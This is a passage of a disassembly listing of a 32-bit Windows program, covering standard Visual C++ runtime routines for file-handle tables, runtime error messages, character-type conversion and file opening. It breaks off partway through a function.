loc_41F580: ; CODE XREF: sub_41F48D+F6�j
; sub_41F48D+FB�j
inc eax
cmp [eax], bl
jnz short loc_41F580
inc eax
cmp [eax], bl
jnz short loc_41F580
loc_41F58A: ; CODE XREF: sub_41F48D+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_417B89
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_41F5A0
xor esi, esi
jmp short loc_41F5AB
; ---------------------------------------------------------------------------
loc_41F5A0: ; CODE XREF: sub_41F48D+10D�j
push ebp
push edi
push esi
call sub_417390
add esp, 0Ch
loc_41F5AB: ; CODE XREF: sub_41F48D+111�j
push edi
call ds:dword_424048 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_41F5B8
; ---------------------------------------------------------------------------
loc_41F5B6: ; CODE XREF: sub_41F48D+39�j
; sub_41F48D+61�j ...
xor eax, eax
loc_41F5B8: ; CODE XREF: sub_41F48D+D6�j
; sub_41F48D+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_41F48D endp
; =============== S U B R O U T I N E =======================================
sub_41F5BF proc near ; CODE XREF: _0:00419C53�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_417B89
mov esi, eax
pop ecx
test esi, esi
jnz short loc_41F5DF
push 1Bh
call sub_419CDA
pop ecx
loc_41F5DF: ; CODE XREF: sub_41F5BF+16�j
mov ds:dword_48B340, esi
mov ds:dword_48B440, 20h
lea eax, [esi+100h]
loc_41F5F5: ; CODE XREF: sub_41F5BF+52�j
cmp esi, eax
jnb short loc_41F613
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, ds:dword_48B340
add esi, 8
add eax, 100h
jmp short loc_41F5F5
; ---------------------------------------------------------------------------
loc_41F613: ; CODE XREF: sub_41F5BF+38�j
lea eax, [esp+54h+var_44]
push eax
call ds:dword_424198 ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_41F6EF
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_41F6EF
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_41F649
mov esi, eax
loc_41F649: ; CODE XREF: sub_41F5BF+86�j
cmp ds:dword_48B440, esi
jge short loc_41F6A3
mov edi, offset dword_48B344
loc_41F656: ; CODE XREF: sub_41F5BF+DA�j
push 100h
call sub_417B89
test eax, eax
pop ecx
jz short loc_41F69D
add ds:dword_48B440, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_41F674: ; CODE XREF: sub_41F5BF+CF�j
cmp eax, ecx
jnb short loc_41F690
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_41F674
; ---------------------------------------------------------------------------
loc_41F690: ; CODE XREF: sub_41F5BF+B7�j
add edi, 4
cmp ds:dword_48B440, esi
jl short loc_41F656
jmp short loc_41F6A3
; ---------------------------------------------------------------------------
loc_41F69D: ; CODE XREF: sub_41F5BF+A4�j
mov esi, ds:dword_48B440
loc_41F6A3: ; CODE XREF: sub_41F5BF+90�j
; sub_41F5BF+DC�j
xor edi, edi
test esi, esi
jle short loc_41F6EF
loc_41F6A9: ; CODE XREF: sub_41F5BF+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_41F6E6
mov cl, [ebp+0]
test cl, 1
jz short loc_41F6E6
test cl, 8
jnz short loc_41F6C8
push eax
call ds:dword_424030 ; GetFileType
test eax, eax
jz short loc_41F6E6
loc_41F6C8: ; CODE XREF: sub_41F5BF+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_48B340[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_41F6E6: ; CODE XREF: sub_41F5BF+EF�j
; sub_41F5BF+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_41F6A9
loc_41F6EF: ; CODE XREF: sub_41F5BF+65�j
; sub_41F5BF+71�j ...
xor ebx, ebx
loc_41F6F1: ; CODE XREF: sub_41F5BF+195�j
mov eax, ds:dword_48B340
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_41F74C
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_41F70C
push 0FFFFFFF6h
pop eax
jmp short loc_41F716
; ---------------------------------------------------------------------------
loc_41F70C: ; CODE XREF: sub_41F5BF+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_41F716: ; CODE XREF: sub_41F5BF+14B�j
push eax
call ds:dword_424034 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41F73B
push edi
call ds:dword_424030 ; GetFileType
test eax, eax
jz short loc_41F73B
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_41F741
loc_41F73B: ; CODE XREF: sub_41F5BF+163�j
; sub_41F5BF+16E�j
or byte ptr [esi+4], 40h
jmp short loc_41F750
; ---------------------------------------------------------------------------
loc_41F741: ; CODE XREF: sub_41F5BF+17A�j
cmp eax, 3
jnz short loc_41F750
or byte ptr [esi+4], 8
jmp short loc_41F750
; ---------------------------------------------------------------------------
loc_41F74C: ; CODE XREF: sub_41F5BF+13E�j
or byte ptr [esi+4], 80h
loc_41F750: ; CODE XREF: sub_41F5BF+180�j
; sub_41F5BF+185�j ...
inc ebx
cmp ebx, 3
jl short loc_41F6F1
push ds:dword_48B440
call ds:dword_424038 ; LockResource
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_41F5BF endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F774 proc near ; DATA XREF: _0:00419BEE�o
; sub_41CFF1+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_41F814
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41F7A7: ; CODE XREF: sub_41F774+90�j
cmp esi, 0FFFFFFFFh
jz short loc_41F80D
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41F7FB
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_41F7FB
js short loc_41F806
mov edi, [ebx+8]
push ebx
call sub_4181A0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4181E2
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_418276
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_41F7FB: ; CODE XREF: sub_41F774+40�j
; sub_41F774+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_41F7A7
; ---------------------------------------------------------------------------
loc_41F806: ; CODE XREF: sub_41F774+54�j
mov eax, 0
jmp short loc_41F829
; ---------------------------------------------------------------------------
loc_41F80D: ; CODE XREF: sub_41F774+36�j
mov eax, 1
jmp short loc_41F829
; ---------------------------------------------------------------------------
loc_41F814: ; CODE XREF: sub_41F774+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4181E2
add esp, 8
pop ebp
mov eax, 1
loc_41F829: ; CODE XREF: sub_41F774+97�j
; sub_41F774+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41F774 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4181E2
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41F84C proc near ; CODE XREF: sub_419CDA+9�p
; sub_419CFF+9�p
mov eax, ds:dword_48A068
cmp eax, 1
jz short loc_41F863
test eax, eax
jnz short locret_41F884
cmp ds:dword_439594, 1
jnz short locret_41F884
loc_41F863: ; CODE XREF: sub_41F84C+8�j
push 0FCh
call sub_41F885
mov eax, ds:dword_48A1D4
pop ecx
test eax, eax
jz short loc_41F879
call eax
loc_41F879: ; CODE XREF: sub_41F84C+29�j
push 0FFh
call sub_41F885
pop ecx
locret_41F884: ; CODE XREF: sub_41F84C+C�j
; sub_41F84C+15�j
retn
sub_41F84C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F885 proc near ; CODE XREF: sub_419CDA+12�p
; sub_419CFF+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_43BC28
loc_41F898: ; CODE XREF: sub_41F885+20�j
cmp edx, [eax]
jz short loc_41F8A7
add eax, 8
inc ecx
cmp eax, offset off_43BCB8
jl short loc_41F898
loc_41F8A7: ; CODE XREF: sub_41F885+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, ds:dword_43BC28[esi]
jnz loc_41F9D5
mov eax, ds:dword_48A068
cmp eax, 1
jz loc_41F9AF
test eax, eax
jnz short loc_41F8D8
cmp ds:dword_439594, 1
jz loc_41F9AF
loc_41F8D8: ; CODE XREF: sub_41F885+44�j
cmp edx, 0FCh
jz loc_41F9D5
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call ds:off_424094
test eax, eax
jnz short loc_41F90F
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_4179C0
pop ecx
pop ecx
loc_41F90F: ; CODE XREF: sub_41F885+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_417AB0
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_41F952
lea eax, [ebp+var_1A4]
push eax
call sub_417AB0
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_418C10
add esp, 10h
loc_41F952: ; CODE XREF: sub_41F885+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_4179C0
lea eax, [ebp+var_A0]
push edi
push eax
call sub_4179D0
lea eax, [ebp+var_A0]
push offset asc_424BA8 ; "\n\n"
push eax
call sub_4179D0
push ds:off_43BC2C[esi]
lea eax, [ebp+var_A0]
push eax
call sub_4179D0
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_42105F
add esp, 2Ch
pop edi
jmp short loc_41F9D5
; ---------------------------------------------------------------------------
loc_41F9AF: ; CODE XREF: sub_41F885+3C�j
; sub_41F885+4D�j
lea eax, [ebp+arg_0]
lea esi, off_43BC2C[esi]
push 0
push eax
push dword ptr [esi]
call sub_417AB0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_424034 ; GetStdHandle
push eax
call ds:dword_42407C ; WriteFile
loc_41F9D5: ; CODE XREF: sub_41F885+2E�j
; sub_41F885+59�j ...
pop esi
leave
retn
sub_41F885 endp
; =============== S U B R O U T I N E =======================================
sub_41F9D8 proc near ; CODE XREF: sub_419D23+6C�p
; sub_41E248+32�p ...
arg_0 = dword ptr 4
inc ds:dword_48A1D8
push 1000h
call sub_417B89
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_41FA01
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_41FA12
; ---------------------------------------------------------------------------
loc_41FA01: ; CODE XREF: sub_41F9D8+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_41FA12: ; CODE XREF: sub_41F9D8+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_41F9D8 endp
; =============== S U B R O U T I N E =======================================
sub_41FA1C proc near ; CODE XREF: sub_419D23+61�p
; sub_41A8A2+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_48B440
jb short loc_41FA2B
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41FA2B: ; CODE XREF: sub_41FA1C+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_48B340[ecx*4]
mov al, [ecx+eax*8+4]
and eax, 40h
retn
sub_41FA1C endp
; =============== S U B R O U T I N E =======================================
sub_41FA42 proc near ; DATA XREF: _2:00426020�o
mov eax, ds:dword_48B320
push esi
push 14h
test eax, eax
pop esi
jnz short loc_41FA56
mov eax, 200h
jmp short loc_41FA5C
; ---------------------------------------------------------------------------
loc_41FA56: ; CODE XREF: sub_41FA42+B�j
cmp eax, esi
jge short loc_41FA61
mov eax, esi
loc_41FA5C: ; CODE XREF: sub_41FA42+12�j
mov ds:dword_48B320, eax
loc_41FA61: ; CODE XREF: sub_41FA42+16�j
push 4
push eax
call sub_4210E8
pop ecx
mov ds:dword_48A310, eax
test eax, eax
pop ecx
jnz short loc_41FA95
push 4
push esi
mov ds:dword_48B320, esi
call sub_4210E8
pop ecx
mov ds:dword_48A310, eax
test eax, eax
pop ecx
jnz short loc_41FA95
push 1Ah
call sub_419CDA
pop ecx
loc_41FA95: ; CODE XREF: sub_41FA42+30�j
; sub_41FA42+49�j
xor ecx, ecx
mov eax, offset off_43BCB8
loc_41FA9C: ; CODE XREF: sub_41FA42+6E�j
mov edx, ds:dword_48A310
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset dword_43BF38
jl short loc_41FA9C
xor edx, edx
mov ecx, offset dword_43BCC8
loc_41FAB9: ; CODE XREF: sub_41FA42+A1�j
mov eax, edx
mov esi, edx
sar eax, 5
and esi, 1Fh
mov eax, ds:dword_48B340[eax*4]
mov eax, [eax+esi*8]
cmp eax, 0FFFFFFFFh
jz short loc_41FAD6
test eax, eax
jnz short loc_41FAD9
loc_41FAD6: ; CODE XREF: sub_41FA42+8E�j
or dword ptr [ecx], 0FFFFFFFFh
loc_41FAD9: ; CODE XREF: sub_41FA42+92�j
add ecx, 20h
inc edx
cmp ecx, offset dword_43BD28
jl short loc_41FAB9
pop esi
retn
sub_41FA42 endp
; =============== S U B R O U T I N E =======================================
sub_41FAE7 proc near ; DATA XREF: _2:00426030�o
; FUNCTION CHUNK AT 00421199 SIZE 00000058 BYTES
call sub_41A82C
cmp ds:byte_48A054, 0
jz short locret_41FAFA
jmp loc_421199
; ---------------------------------------------------------------------------
locret_41FAFA: ; CODE XREF: sub_41FAE7+C�j
retn
sub_41FAE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FAFB proc near ; CODE XREF: sub_419E38+2D4�p
; sub_419E38+6B3�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_41FB07
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41FB07: ; CODE XREF: sub_41FAFB+8�j
cmp ds:dword_48A0A8, 0
jnz short loc_41FB22
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_41FB54
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41FB22: ; CODE XREF: sub_41FAFB+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push ds:dword_4397AC
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push ds:dword_48A0B8
call ds:dword_424150 ; WideCharToMultiByte
test eax, eax
jz short loc_41FB54
cmp [ebp+arg_0], 0
jz short loc_41FB61
loc_41FB54: ; CODE XREF: sub_41FAFB+1E�j
; sub_41FAFB+51�j
mov ds:dword_48A014, 2Ah
or eax, 0FFFFFFFFh
loc_41FB61: ; CODE XREF: sub_41FAFB+57�j
pop ebp
retn
sub_41FAFB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FB63 proc near ; CODE XREF: sub_41A642+5E�p
; sub_41EB6C+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424BE8
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_48A1DC
xor ebx, ebx
cmp eax, ebx
jnz short loc_41FBD2
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_4248D8
push esi
call ds:dword_424028 ; GetStringTypeW
test eax, eax
jz short loc_41FBB0
mov eax, esi
jmp short loc_41FBCD
; ---------------------------------------------------------------------------
loc_41FBB0: ; CODE XREF: sub_41FB63+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_43C824
push esi
push ebx
call ds:dword_42402C ; GetStringTypeA
test eax, eax
jz loc_41FC98
push 2
pop eax
loc_41FBCD: ; CODE XREF: sub_41FB63+4B�j
mov ds:dword_48A1DC, eax
loc_41FBD2: ; CODE XREF: sub_41FB63+2F�j
cmp eax, 2
jnz short loc_41FBFB
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_41FBE3
mov eax, ds:dword_48A0A8
loc_41FBE3: ; CODE XREF: sub_41FB63+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call ds:dword_42402C ; GetStringTypeA
jmp loc_41FC9A
; ---------------------------------------------------------------------------
loc_41FBFB: ; CODE XREF: sub_41FB63+72�j
cmp eax, 1
jnz loc_41FC98
cmp [ebp+arg_10], ebx
jnz short loc_41FC11
mov eax, ds:dword_48A0B8
mov [ebp+arg_10], eax
loc_41FC11: ; CODE XREF: sub_41FB63+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call ds:dword_424070 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_41FC98
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_417330
add esp, 0Ch
jmp short loc_41FC67
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_41FC67: ; CODE XREF: sub_41FB63+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_41FC98
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_424070 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_41FC98
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_424028 ; GetStringTypeW
jmp short loc_41FC9A
; ---------------------------------------------------------------------------
loc_41FC98: ; CODE XREF: sub_41FB63+61�j
; sub_41FB63+9B�j ...
xor eax, eax
loc_41FC9A: ; CODE XREF: sub_41FB63+93�j
; sub_41FB63+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41FB63 endp
; =============== S U B R O U T I N E =======================================
sub_41FCAC proc near ; CODE XREF: sub_41FEC6:loc_42003E�p
push ebx
push esi
push edi
or ebx, 0FFFFFFFFh
xor edi, edi
xor esi, esi
mov ecx, offset dword_48B340
loc_41FCBB: ; CODE XREF: sub_41FCAC+48�j
mov eax, [ecx]
test eax, eax
jz short loc_41FCF8
lea edx, [eax+100h]
loc_41FCC7: ; CODE XREF: sub_41FCAC+28�j
cmp eax, edx
jnb short loc_41FCE7
test byte ptr [eax+4], 1
jz short loc_41FCD6
add eax, 8
jmp short loc_41FCC7
; ---------------------------------------------------------------------------
loc_41FCD6: ; CODE XREF: sub_41FCAC+23�j
or dword ptr [eax], 0FFFFFFFFh
sub eax, [ecx]
sar eax, 3
add eax, esi
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41FD3B
loc_41FCE7: ; CODE XREF: sub_41FCAC+1D�j
add ecx, 4
inc edi
add esi, 20h
cmp ecx, offset dword_48B440
jl short loc_41FCBB
jmp short loc_41FD3B
; ---------------------------------------------------------------------------
loc_41FCF8: ; CODE XREF: sub_41FCAC+13�j
mov esi, 100h
push esi
call sub_417B89
test eax, eax
pop ecx
jz short loc_41FD3B
add ds:dword_48B440, 20h
lea ecx, ds:48B340h[edi*4]
lea edx, [eax+100h]
mov [ecx], eax
loc_41FD1E: ; CODE XREF: sub_41FCAC+88�j
cmp eax, edx
jnb short loc_41FD36
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 8
add edx, esi
jmp short loc_41FD1E
; ---------------------------------------------------------------------------
loc_41FD36: ; CODE XREF: sub_41FCAC+74�j
shl edi, 5
mov ebx, edi
loc_41FD3B: ; CODE XREF: sub_41FCAC+39�j
; sub_41FCAC+4A�j ...
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41FCAC endp
; =============== S U B R O U T I N E =======================================
sub_41FD41 proc near ; CODE XREF: sub_41FEC6+1F4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, ds:dword_48B440
push edi
jnb short loc_41FDA1
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:48B340h[ecx*4]
shl esi, 3
mov ecx, [edi]
cmp dword ptr [ecx+esi], 0FFFFFFFFh
jnz short loc_41FDA1
cmp ds:dword_439594, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_41FD97
sub eax, 0
jz short loc_41FD8E
dec eax
jz short loc_41FD89
dec eax
jnz short loc_41FD97
push ebx
push 0FFFFFFF4h
jmp short loc_41FD91
; ---------------------------------------------------------------------------
loc_41FD89: ; CODE XREF: sub_41FD41+3E�j
push ebx
push 0FFFFFFF5h
jmp short loc_41FD91
; ---------------------------------------------------------------------------
loc_41FD8E: ; CODE XREF: sub_41FD41+3B�j
push ebx
push 0FFFFFFF6h
loc_41FD91: ; CODE XREF: sub_41FD41+46�j
; sub_41FD41+4B�j
call ds:dword_424024 ; SetStdHandle
loc_41FD97: ; CODE XREF: sub_41FD41+36�j
; sub_41FD41+41�j
mov eax, [edi]
mov [eax+esi], ebx
xor eax, eax
pop ebx
jmp short loc_41FDB5
; ---------------------------------------------------------------------------
loc_41FDA1: ; CODE XREF: sub_41FD41+C�j
; sub_41FD41+28�j
and ds:dword_48A018, 0
mov ds:dword_48A014, 9
or eax, 0FFFFFFFFh
loc_41FDB5: ; CODE XREF: sub_41FD41+5E�j
pop edi
pop esi
retn
sub_41FD41 endp
; =============== S U B R O U T I N E =======================================
sub_41FDB8 proc near ; CODE XREF: sub_41A6B7+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, ds:dword_48B440
push edi
jnb short loc_41FE1B
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea edi, ds:48B340h[eax*4]
shl esi, 3
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_41FE1B
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41FE1B
cmp ds:dword_439594, 1
jnz short loc_41FE11
xor eax, eax
sub ecx, eax
jz short loc_41FE08
dec ecx
jz short loc_41FE03
dec ecx
jnz short loc_41FE11
push eax
push 0FFFFFFF4h
jmp short loc_41FE0B
; ---------------------------------------------------------------------------
loc_41FE03: ; CODE XREF: sub_41FDB8+41�j
push eax
push 0FFFFFFF5h
jmp short loc_41FE0B
; ---------------------------------------------------------------------------
loc_41FE08: ; CODE XREF: sub_41FDB8+3E�j
push eax
push 0FFFFFFF6h
loc_41FE0B: ; CODE XREF: sub_41FDB8+49�j
; sub_41FDB8+4E�j
call ds:dword_424024 ; SetStdHandle
loc_41FE11: ; CODE XREF: sub_41FDB8+38�j
; sub_41FDB8+44�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_41FE2F
; ---------------------------------------------------------------------------
loc_41FE1B: ; CODE XREF: sub_41FDB8+C�j
; sub_41FDB8+2A�j ...
and ds:dword_48A018, 0
mov ds:dword_48A014, 9
or eax, 0FFFFFFFFh
loc_41FE2F: ; CODE XREF: sub_41FDB8+61�j
pop edi
pop esi
retn
sub_41FDB8 endp
; =============== S U B R O U T I N E =======================================
sub_41FE32 proc near ; CODE XREF: sub_41A6B7+32�p
; sub_41A6B7+49�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_48B440
jnb short loc_41FE5A
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_48B340[ecx*4]
test byte ptr [ecx+eax*8+4], 1
lea eax, [ecx+eax*8]
jz short loc_41FE5A
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_41FE5A: ; CODE XREF: sub_41FE32+A�j
; sub_41FE32+23�j
and ds:dword_48A018, 0
mov ds:dword_48A014, 9
or eax, 0FFFFFFFFh
retn
sub_41FE32 endp
; =============== S U B R O U T I N E =======================================
sub_41FE6F proc near ; CODE XREF: sub_41A795+2B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_48B440
jnb short loc_41FEB8
mov ecx, eax
mov edx, eax
sar ecx, 5
and edx, 1Fh
mov ecx, ds:dword_48B340[ecx*4]
test byte ptr [ecx+edx*8+4], 1
jz short loc_41FEB8
push eax
call sub_41FE32
pop ecx
push eax
call ds:dword_424020 ; FlushFileBuffers
test eax, eax
jnz short loc_41FEAD
call ds:dword_42408C ; RtlGetLastWin32Error
jmp short loc_41FEAF
; ---------------------------------------------------------------------------
loc_41FEAD: ; CODE XREF: sub_41FE6F+34�j
xor eax, eax
loc_41FEAF: ; CODE XREF: sub_41FE6F+3C�j
test eax, eax
jz short locret_41FEC5
mov ds:dword_48A018, eax
loc_41FEB8: ; CODE XREF: sub_41FE6F+A�j
; sub_41FE6F+22�j
mov ds:dword_48A014, 9
or eax, 0FFFFFFFFh
locret_41FEC5: ; CODE XREF: sub_41FE6F+42�j
retn
sub_41FE6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FEC6 proc near ; CODE XREF: sub_41A96C+13F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
push esi
test cl, 80h
push edi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jz short loc_41FEEC
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_41FEF7
; ---------------------------------------------------------------------------
loc_41FEEC: ; CODE XREF: sub_41FEC6+1B�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_41FEF7: ; CODE XREF: sub_41FEC6+24�j
mov eax, 8000h
test ecx, eax
jnz short loc_41FF11
test ch, 40h
jnz short loc_41FF0D
cmp ds:dword_48A2E8, eax
jz short loc_41FF11
loc_41FF0D: ; CODE XREF: sub_41FEC6+3D�j
or [ebp+var_1], 80h
loc_41FF11: ; CODE XREF: sub_41FEC6+38�j
; sub_41FEC6+45�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_41FF49
dec eax
jz short loc_41FF40
dec eax
jz short loc_41FF37
loc_41FF22: ; CODE XREF: sub_41FEC6+9F�j
; sub_41FEC6+E8�j ...
mov ds:dword_48A014, 16h
mov ds:dword_48A018, ebx
jmp loc_42015C
; ---------------------------------------------------------------------------
loc_41FF37: ; CODE XREF: sub_41FEC6+5A�j
mov [ebp+var_C], 0C0000000h
jmp short loc_41FF50
; ---------------------------------------------------------------------------
loc_41FF40: ; CODE XREF: sub_41FEC6+57�j
mov [ebp+var_C], 40000000h
jmp short loc_41FF50
; ---------------------------------------------------------------------------
loc_41FF49: ; CODE XREF: sub_41FEC6+54�j
